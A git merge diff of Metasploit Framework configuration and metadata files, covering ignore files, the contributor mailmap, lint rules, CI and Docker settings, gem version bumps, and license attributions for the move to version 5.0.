Merge remote-tracking branch 'upstream/master' into pr/10418

.dockerignore

@@ -4,6 +4,7 @@
 docker-compose*.yml
 docker/
 !docker/msfconsole.rc
+!docker/entrypoint.sh
 README.md
 .git/
 .github/
@@ -34,7 +35,7 @@ config/database.yml
 # target config file for testing
 features/support/targets.yml
 # simplecov coverage data
-coverage
+coverage/
 doc/
 external/source/meterpreter/java/bin
 external/source/meterpreter/java/build

.gitignore

@@ -88,7 +88,12 @@ data/meterpreter/ext_server_pivot.*.dll
 
 # local docker compose overrides
 docker-compose.local*
+.env
 
 # Ignore python bytecode
 *.pyc
 rspec.failures
+
+
+#Ignore any base disk store files
+db/modules_metadata_base.pstore

.mailmap

@@ -1,6 +1,7 @@
 acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
 acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
 acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
+asoto-r7 <asoto-r7@github>           <aaron_soto@rapid7.com>
 bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
 bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
 bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
@@ -30,6 +31,7 @@ lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
 lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
 lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
 lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
+mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
 pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
@@ -39,6 +41,7 @@ sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
 shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
+space-r7 <space-r7@github>           <shelby_pace@rapid7.com>
 tatanus <tatanus@github>             <adam_compton@rapid7.com>
 tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
 todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
@@ -80,6 +83,7 @@ corelanc0d3r <corelanc0d3r@github>     corelanc0d3r <peter.ve@corelan.be>
 corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
+DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmail.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
 espreto <espreto@github>               <robertoespreto@gmail.com>

.rubocop.yml

@@ -17,6 +17,10 @@ Metrics/ClassLength:
   Exclude:
     - 'modules/**/*'
 
+Style/ClassAndModuleChildren:
+  Enabled: false
+  Description: 'Forced nesting is harmful for grepping and general code comprehension'
+
 Metrics/AbcSize:
   Enabled: false
   Description: 'This is often a red-herring'
@@ -29,6 +33,10 @@ Metrics/PerceivedComplexity:
   Enabled: false
   Description: 'This is often a red-herring'
 
+Style/TernaryParentheses:
+  Enabled: false
+  Description: 'This outright produces bugs'
+
 Style/FrozenStringLiteralComment:
   Enabled: false
   Description: 'We cannot support this yet without a lot of things breaking'
@@ -37,6 +45,10 @@ Style/RedundantReturn:
   Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
   Enabled: false
 
+Style/NumericPredicate:
+  Description: 'This adds no efficiency nor space saving'
+  Enabled: false
+
 Style/Documentation:
   Enabled: true
   Description: 'Most Metasploit modules do not have class documentation.'
@@ -92,9 +104,10 @@ Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
-Layout/SpaceInsideBrackets:
-  Enabled: false
-  Description: 'Until module template are final, most modules will fail this.'
+Layout/AlignParameters:
+  Enabled: true
+  EnforcedStyle: 'with_fixed_indentation'
+  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
 
 Style/StringLiterals:
   Enabled: false
@@ -104,6 +117,10 @@ Style/WordArray:
   Enabled: false
   Description: 'Metasploit prefers consistent use of []'
 
+Style/IfUnlessModifier:
+  Enabled: false
+  Description: 'This style might save a couple of lines, but often makes code less clear'
+
 Style/RedundantBegin:
   Exclude:
     # this pattern is very common and somewhat unavoidable

.ruby-version

@@ -1 +1 @@
-2.4.2
+2.5.1

.travis.yml

@@ -11,25 +11,35 @@ addons:
       - graphviz
 language: ruby
 rvm:
-  - '2.2'
-  - '2.3.5'
-  - '2.4.2'
+  - '2.3.7'
+  - '2.4.4'
+  - '2.5.1'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
+  # Used for testing the remote data service
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
 
 matrix:
   fast_finish: true
+  exclude:
+  - rvm: '2.3.7'
+    env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
+  - rvm: '2.4.4'
+    env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
 
 jobs:
   # build docker image
   include:
-  - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true"
+  - env: CMD="/usr/bin/docker-compose build" DOCKER="true"
     # we do not need any setup
     before_install: skip
     install: skip
-    before_script: skip
+    before_script:
+      - curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
+      - chmod +x docker-compose
+      - sudo mv docker-compose /usr/bin
 before_install:
   - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
   - rake --version
@@ -49,7 +59,9 @@ before_script:
 script:
   - echo "${CMD}"
     # we need travis_wait because the Docker build job can take longer than 10 minutes
-  - if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
+    #- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
+    # docker_wait is currently broken on travis-ci, so let's just run CMD directly for now
+  - bash -c "${CMD}"
 
 notifications:
   irc: "irc.freenode.org#msfnotify"

CONTRIBUTING.md

@@ -36,8 +36,13 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
 * **Do** follow the [50/72 rule] for Git commit messages.
 * **Don't** use the default merge messages when merging from other branches.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.
+ If you do not send a PR from a topic branch, the history of your PR will be
+ lost as soon as you update your own master branch. See
+ https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
+ this in action.
+
 
 ### Pull Requests
 
@@ -45,8 +50,8 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
-* **Do** [reference associated issues] in your pull request description
-* **Do** write [release notes] once a pull request is landed
+* **Do** [reference associated issues] in your pull request description.
+* **Do** write [release notes] once a pull request is landed.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 
@@ -58,8 +63,8 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
   - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
 * **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
-* **Do** include instructions on how to setup the vulnerable environment or software
-* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs
+* **Do** include instructions on how to setup the vulnerable environment or software.
+* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
 
 
 

COPYING

@@ -1,4 +1,4 @@
-Copyright (C) 2006-2017, Rapid7, Inc.
+Copyright (C) 2006-2018, Rapid7, Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,

CURRENT.md

@@ -0,0 +1,20 @@
+Active Metasploit 5 development will sometimes push aggressive changes.
+Integrations with 3rd-party tools, as well as general usage, may change quickly
+from day to day. Some of the steps for dealing with major changes will be
+documented here. We will continue to maintain the Metasploit 4.x branch until
+Metasploit 5.0 is released.
+
+**2018/01/17 - [internal] module cache reworked to not store metadata in PostgreSQL**
+
+Metasploit no longer stores module metadata in a PostgreSQL database, instead
+storing it in a cache file in your local ~/.msf4 config directory. This has a
+number of advantages:
+
+ * Fast searches whether you have the database enabled or not (no more slow search mode)
+ * Faster load time for msfconsole, the cache loads more quickly
+ * Private module data is not uploaded to a shared database, no collisions
+ * Adding or deleting modules no longer displays file-not-found error messages on start in msfconsole
+ * Reduced memory consumption
+
+Code that reads directly from the Metasploit database for module data will need
+to use the new module search API.

Dockerfile

@@ -1,30 +1,36 @@
-FROM ruby:2.4.2-alpine
-MAINTAINER Rapid7
+FROM ruby:2.5.1-alpine3.7
+LABEL maintainer="Rapid7"
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
 ENV APP_HOME /usr/src/metasploit-framework/
-ENV MSF_USER msf
 ENV NMAP_PRIVILEGED=""
+ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME
 
-COPY Gemfile* m* Rakefile $APP_HOME
-COPY lib $APP_HOME/lib
+COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
+COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
+COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
+COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
 
 RUN apk update && \
     apk add \
+      bash \
       sqlite-libs \
       nmap \
       nmap-scripts \
       nmap-nselibs \
       postgresql-libs \
+      python \
+      python3 \
       ncurses \
       libcap \
+      su-exec \
     && apk add --virtual .ruby-builddeps \
       autoconf \
       bison \
       build-base \
       ruby-dev \
-      openssl-dev \
+      libressl-dev \
       readline-dev \
       sqlite-dev \
       postgresql-dev \
@@ -42,13 +48,16 @@ RUN apk update && \
     && apk del .ruby-builddeps \
     && rm -rf /var/cache/apk/*
 
-RUN adduser -g msfconsole -D $MSF_USER
-
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
-RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip /usr/bin/nmap
-
-USER $MSF_USER
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
 
 ADD ./ $APP_HOME
 
+# we need this entrypoint to dynamically create a user
+# matching the hosts UID and GID so we can mount something
+# from the users home directory. If the IDs don't match
+# it results in access denied errors. Once docker has
+# a solution for this we can revert it back to normal
+ENTRYPOINT ["docker/entrypoint.sh"]
+
 CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]

Gemfile

@@ -19,15 +19,13 @@ group :development do
   # module documentation
   gem 'octokit'
   # Metasploit::Aggregator external session proxy
-  gem 'metasploit-aggregator' if [
-    'x86-mingw32', 'x64-mingw32',
-    'x86_64-linux', 'x86-linux',
-    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
+  # disabled during 2.5 transition until aggregator is available
+  #gem 'metasploit-aggregator'
 end
 
 group :development, :test do
   # automatically include factories from spec/factories
-  gem 'factory_girl_rails'
+  gem 'factory_bot_rails'
   # Make rspec output shorter and more useful
   gem 'fivemat'
   # running documentation generation tasks and rspec tasks
@@ -36,6 +34,7 @@ group :development, :test do
   # environment is development
   gem 'rspec-rails'
   gem 'rspec-rerun'
+  gem 'swagger-blocks'
 end
 
 group :test do

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.13)
+    metasploit-framework (5.0.0)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -10,6 +10,7 @@ PATH
       bcrypt_pbkdf
       bit-struct
       dnsruby
+      faker
       filesize
       jsobfu
       json
@@ -17,9 +18,10 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.11)
+      metasploit-payloads (= 1.3.47)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.2.2)
+      metasploit_payloads-mettle (= 0.4.1)
+      mqtt
       msgpack
       nessus_rest
       net-ssh
@@ -36,8 +38,6 @@ PATH
       pg (= 0.20.0)
       railties
       rb-readline
-      rbnacl (< 5.0.0)
-      rbnacl-libsodium
       recog
       redcarpet
       rex-arch
@@ -49,7 +49,7 @@ PATH
       rex-mime
       rex-nop
       rex-ole
-      rex-powershell (< 0.1.73)
+      rex-powershell
       rex-random_identifier
       rex-registry
       rex-rop_builder
@@ -58,13 +58,18 @@ PATH
       rex-struct2
       rex-text
       rex-zip
+      ruby-macho
       ruby_smb
       rubyntlm
       rubyzip
+      sinatra
       sqlite3
       sshkey
+      sysrandom
+      thin
       tzinfo
       tzinfo-data
+      warden
       windows_error
       xdr
       xmlrpc
@@ -72,7 +77,7 @@ PATH
 GEM
   remote: https://rubygems.org/
   specs:
-    Ascii85 (1.0.2)
+    Ascii85 (1.0.3)
     actionpack (4.2.10)
       actionview (= 4.2.10)
       activesupport (= 4.2.10)
@@ -102,74 +107,55 @@ GEM
       public_suffix (>= 2.0.2, < 4.0)
     afm (0.2.2)
     arel (6.0.4)
-    arel-helpers (2.5.0)
+    arel-helpers (2.8.0)
       activerecord (>= 3.1.0, < 6)
-    backports (3.10.3)
-    bcrypt (3.1.11)
+    backports (3.11.4)
+    bcrypt (3.1.12)
     bcrypt_pbkdf (1.0.0)
-    bindata (2.4.1)
+    bindata (2.4.3)
     bit-struct (0.16)
     builder (3.2.3)
     coderay (1.1.2)
     concurrent-ruby (1.0.5)
-    crass (1.0.2)
+    crass (1.0.4)
+    daemons (1.2.6)
     diff-lcs (1.3)
-    dnsruby (1.60.2)
-    docile (1.1.5)
+    dnsruby (1.61.2)
+      addressable (~> 2.5)
+    docile (1.3.1)
     erubis (2.7.0)
-    factory_girl (4.8.1)
+    eventmachine (1.2.7)
+    factory_bot (4.11.1)
       activesupport (>= 3.0.0)
-    factory_girl_rails (4.8.0)
-      factory_girl (~> 4.8.0)
+    factory_bot_rails (4.11.1)
+      factory_bot (~> 4.11.1)
       railties (>= 3.0.0)
-    faraday (0.13.1)
+    faker (1.9.1)
+      i18n (>= 0.7)
+    faraday (0.15.2)
       multipart-post (>= 1.2, < 3)
-    ffi (1.9.18)
-    filesize (0.1.1)
-    fivemat (1.3.5)
-    google-protobuf (3.4.1.1)
-    googleapis-common-protos-types (1.0.0)
-      google-protobuf (~> 3.0)
-    googleauth (0.5.3)
-      faraday (~> 0.12)
-      jwt (~> 1.4)
-      logging (~> 2.0)
-      memoist (~> 0.12)
-      multi_json (~> 1.11)
-      os (~> 0.9)
-      signet (~> 0.7)
-    grpc (1.6.7)
-      google-protobuf (~> 3.1)
-      googleapis-common-protos-types (~> 1.0.0)
-      googleauth (~> 0.5.1)
+    filesize (0.2.0)
+    fivemat (1.3.7)
     hashery (2.1.2)
-    i18n (0.9.0)
+    i18n (0.9.5)
       concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
     json (2.1.0)
-    jwt (1.5.6)
-    little-plugger (1.1.4)
-    logging (2.2.2)
-      little-plugger (~> 1.1)
-      multi_json (~> 1.10)
-    loofah (2.1.1)
+    loofah (2.2.2)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
-    memoist (0.16.0)
     metasm (1.0.3)
-    metasploit-aggregator (1.0.0)
-      grpc
-      rex-arch
     metasploit-concern (2.0.5)
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (2.0.12)
+    metasploit-credential (3.0.1)
       metasploit-concern
       metasploit-model
-      metasploit_data_models
-      pg
+      metasploit_data_models (>= 3.0.0)
+      net-ssh
+      pg (~> 0.15)
       railties
       rex-socket
       rubyntlm
@@ -178,40 +164,39 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.11)
-    metasploit_data_models (2.0.15)
+    metasploit-payloads (1.3.47)
+    metasploit_data_models (3.0.0)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
       metasploit-concern
       metasploit-model
-      pg
+      pg (= 0.20.0)
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.2.2)
+    metasploit_payloads-mettle (0.4.1)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
-    minitest (5.10.3)
-    msgpack (1.1.0)
-    multi_json (1.12.2)
+    minitest (5.11.3)
+    mqtt (0.5.0)
+    msgpack (1.2.4)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
-    net-ssh (4.2.0)
+    net-ssh (5.0.2)
     network_interface (0.0.2)
-    nexpose (7.1.1)
-    nokogiri (1.8.1)
+    nexpose (7.2.1)
+    nokogiri (1.8.4)
       mini_portile2 (~> 2.3.0)
-    octokit (4.7.0)
+    octokit (4.12.0)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
-    os (0.9.6)
     packetfu (1.1.13)
       pcaprub
     patch_finder (1.0.2)
-    pcaprub (0.12.4)
-    pdf-reader (2.0.0)
+    pcaprub (0.13.0)
+    pdf-reader (2.1.0)
       Ascii85 (~> 1.0.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
@@ -219,40 +204,38 @@ GEM
       ttfunk
     pg (0.20.0)
     pg_array_parser (0.0.9)
-    postgres_ext (3.0.0)
-      activerecord (>= 4.0.0)
+    postgres_ext (3.0.1)
+      activerecord (~> 4.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
-    pry (0.11.2)
+    pry (0.11.3)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
-    public_suffix (3.0.0)
-    rack (1.6.8)
+    public_suffix (3.0.3)
+    rack (1.6.10)
+    rack-protection (1.5.5)
+      rack
     rack-test (0.6.3)
       rack (>= 1.0)
     rails-deprecated_sanitizer (1.0.3)
       activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.8)
-      activesupport (>= 4.2.0.beta, < 5.0)
+    rails-dom-testing (1.0.9)
+      activesupport (>= 4.2.0, < 5.0)
       nokogiri (~> 1.6)
       rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.0.3)
-      loofah (~> 2.0)
+    rails-html-sanitizer (1.0.4)
+      loofah (~> 2.2, >= 2.2.2)
     railties (4.2.10)
       actionpack (= 4.2.10)
       activesupport (= 4.2.10)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rake (12.1.0)
+    rake (12.3.1)
     rb-readline (0.5.5)
-    rbnacl (4.0.2)
-      ffi
-    rbnacl-libsodium (1.0.13)
-      rbnacl (>= 3.0.1)
-    recog (2.1.15)
+    recog (2.1.22)
       nokogiri
     redcarpet (3.4.0)
-    rex-arch (0.1.11)
+    rex-arch (0.1.13)
       rex-text
     rex-bin_tools (0.1.4)
       metasm
@@ -260,12 +243,12 @@ GEM
       rex-core
       rex-struct2
       rex-text
-    rex-core (0.1.12)
+    rex-core (0.1.13)
     rex-encoder (0.1.4)
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.15)
+    rex-exploitation (0.1.19)
       jsobfu
       metasm
       rex-arch
@@ -278,7 +261,7 @@ GEM
       rex-arch
     rex-ole (0.1.6)
       rex-text
-    rex-powershell (0.1.72)
+    rex-powershell (0.1.79)
       rex-random_identifier
       rex-text
     rex-random_identifier (0.1.4)
@@ -288,84 +271,92 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.9)
+    rex-socket (0.1.15)
       rex-core
     rex-sslscan (0.1.5)
       rex-core
       rex-socket
       rex-text
     rex-struct2 (0.1.2)
-    rex-text (0.2.15)
+    rex-text (0.2.21)
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
-    rspec (3.7.0)
-      rspec-core (~> 3.7.0)
-      rspec-expectations (~> 3.7.0)
-      rspec-mocks (~> 3.7.0)
-    rspec-core (3.7.0)
-      rspec-support (~> 3.7.0)
-    rspec-expectations (3.7.0)
+    rspec (3.8.0)
+      rspec-core (~> 3.8.0)
+      rspec-expectations (~> 3.8.0)
+      rspec-mocks (~> 3.8.0)
+    rspec-core (3.8.0)
+      rspec-support (~> 3.8.0)
+    rspec-expectations (3.8.1)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.7.0)
-    rspec-mocks (3.7.0)
+      rspec-support (~> 3.8.0)
+    rspec-mocks (3.8.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.7.0)
-    rspec-rails (3.7.1)
+      rspec-support (~> 3.8.0)
+    rspec-rails (3.8.0)
       actionpack (>= 3.0)
       activesupport (>= 3.0)
       railties (>= 3.0)
-      rspec-core (~> 3.7.0)
-      rspec-expectations (~> 3.7.0)
-      rspec-mocks (~> 3.7.0)
-      rspec-support (~> 3.7.0)
+      rspec-core (~> 3.8.0)
+      rspec-expectations (~> 3.8.0)
+      rspec-mocks (~> 3.8.0)
+      rspec-support (~> 3.8.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.7.0)
+    rspec-support (3.8.0)
+    ruby-macho (2.0.0)
     ruby-rc4 (0.1.5)
-    ruby_smb (0.0.18)
+    ruby_smb (1.0.4)
       bindata
       rubyntlm
       windows_error
     rubyntlm (0.6.2)
-    rubyzip (1.2.1)
+    rubyzip (1.2.2)
     sawyer (0.8.1)
       addressable (>= 2.3.5, < 2.6)
       faraday (~> 0.8, < 1.0)
-    signet (0.8.1)
-      addressable (~> 2.3)
-      faraday (~> 0.9)
-      jwt (>= 1.5, < 3.0)
-      multi_json (~> 1.10)
-    simplecov (0.15.1)
-      docile (~> 1.1.0)
+    simplecov (0.16.1)
+      docile (~> 1.1)
       json (>= 1.8, < 3)
       simplecov-html (~> 0.10.0)
     simplecov-html (0.10.2)
+    sinatra (1.4.8)
+      rack (~> 1.5)
+      rack-protection (~> 1.4)
+      tilt (>= 1.3, < 3)
     sqlite3 (1.3.13)
     sshkey (1.9.0)
+    swagger-blocks (2.0.2)
+    sysrandom (1.0.5)
+    thin (1.7.2)
+      daemons (~> 1.0, >= 1.0.9)
+      eventmachine (~> 1.0, >= 1.0.4)
+      rack (>= 1, < 3)
     thor (0.20.0)
     thread_safe (0.3.6)
+    tilt (2.0.8)
     timecop (0.9.1)
     ttfunk (1.5.1)
-    tzinfo (1.2.3)
+    tzinfo (1.2.5)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2017.2)
+    tzinfo-data (1.2018.5)
       tzinfo (>= 1.0.0)
+    warden (1.2.7)
+      rack (>= 1.0)
     windows_error (0.1.2)
     xdr (2.0.0)
       activemodel (>= 4.2.7)
       activesupport (>= 4.2.7)
     xmlrpc (0.3.0)
-    yard (0.9.9)
+    yard (0.9.16)
 
 PLATFORMS
   ruby
 
 DEPENDENCIES
-  factory_girl_rails
+  factory_bot_rails
   fivemat
-  metasploit-aggregator
   metasploit-framework!
   octokit
   pry
@@ -374,8 +365,9 @@ DEPENDENCIES
   rspec-rails
   rspec-rerun
   simplecov
+  swagger-blocks
   timecop
   yard
 
 BUNDLED WITH
-   1.15.4
+   1.16.4

LICENSE

@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/
 
 Files: *
-Copyright: 2006-2017, Rapid7, Inc.
+Copyright: 2006-2018, Rapid7, Inc.
 License: BSD-3-clause
 
 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -15,6 +15,11 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #
 
+Files: data/exploits/mysql/lib_mysqludf_sys_*.so
+Copyright: 2007  Roland Bouman
+           2008-2010  Roland Bouman and Bernardo Damele A. G.
+License: LGPL-2.1
+
 Files: data/templates/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause
@@ -70,6 +75,10 @@ Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
 
+Files: lib/msf/core/modules/external/python/async_timeout/*
+Copyright: 2016-2017 Andrew Svetlov
+License: Apache 2.0
+
 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby
@@ -106,6 +115,10 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT
 
+Files: lib/msf/core/db_manager/http/public/*, lib/msf/core/db_manager/http/views/api_docs.erb
+Copyright: Copyright 2018 SmartBear Software
+License: Apache 2.0
+
 License: BSD-2-clause
  Redistribution and use in source and binary forms, with or without modification,
  are permitted provided that the following conditions are met:
@@ -594,6 +607,54 @@ License: Artistic
  DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
  ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
+License: Apache
+ Version 1.1, 2000
+ Modifications by CORE Security Technologies
+ .
+ Copyright (c) 2000 The Apache Software Foundation.  All rights
+ reserved.
+ .
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions
+ are met:
+ .
+ 1. Redistributions of source code must retain the above copyright
+    notice, this list of conditions and the following disclaimer.
+ .
+ 2. Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in
+    the documentation and/or other materials provided with the
+    distribution.
+ .
+ 3. The end-user documentation included with the redistribution,
+    if any, must include the following acknowledgment:
+       "This product includes software developed by
+        CORE Security Technologies (http://www.coresecurity.com/)."
+    Alternately, this acknowledgment may appear in the software itself,
+    if and wherever such third-party acknowledgments normally appear.
+ .
+ 4. The names "Impacket" and "CORE Security Technologies" must
+    not be used to endorse or promote products derived from this
+    software without prior written permission. For written
+    permission, please contact oss@coresecurity.com.
+ .
+ 5. Products derived from this software may not be called "Impacket",
+    nor may "Impacket" appear in their name, without prior written
+    permission of CORE Security Technologies.
+ .
+ THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+ WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+ OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+ LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
+ USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+ OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+ OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ SUCH DAMAGE.
+
 License: Apache
  Version 2.0, January 2004
  http://www.apache.org/licenses/

LICENSE_GEMS

@@ -1,130 +1,135 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.0.2, MIT
-actionpack, 4.2.9, MIT
-actionview, 4.2.9, MIT
-activemodel, 4.2.9, MIT
-activerecord, 4.2.9, MIT
-activesupport, 4.2.9, MIT
-addressable, 2.5.1, "Apache 2.0"
+Ascii85, 1.0.3, MIT
+actionpack, 4.2.10, MIT
+actionview, 4.2.10, MIT
+activemodel, 4.2.10, MIT
+activerecord, 4.2.10, MIT
+activesupport, 4.2.10, MIT
+addressable, 2.5.2, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.4.0, unknown
-backports, 3.8.0, MIT
+arel-helpers, 2.6.1, MIT
+backports, 3.11.1, MIT
 bcrypt, 3.1.11, MIT
-bindata, 2.4.0, ruby
+bcrypt_pbkdf, 1.0.0, MIT
+bindata, 2.4.3, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.3, MIT
-bundler, 1.15.1, MIT
-coderay, 1.1.1, MIT
+bundler, 1.16.1, MIT
+coderay, 1.1.2, MIT
+concurrent-ruby, 1.0.5, MIT
+crass, 1.0.3, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.60.1, "Apache 2.0"
-docile, 1.1.5, MIT
+dnsruby, 1.60.2, "Apache 2.0"
+docile, 1.3.0, MIT
 erubis, 2.7.0, MIT
-factory_girl, 4.8.0, MIT
-factory_girl_rails, 4.8.0, MIT
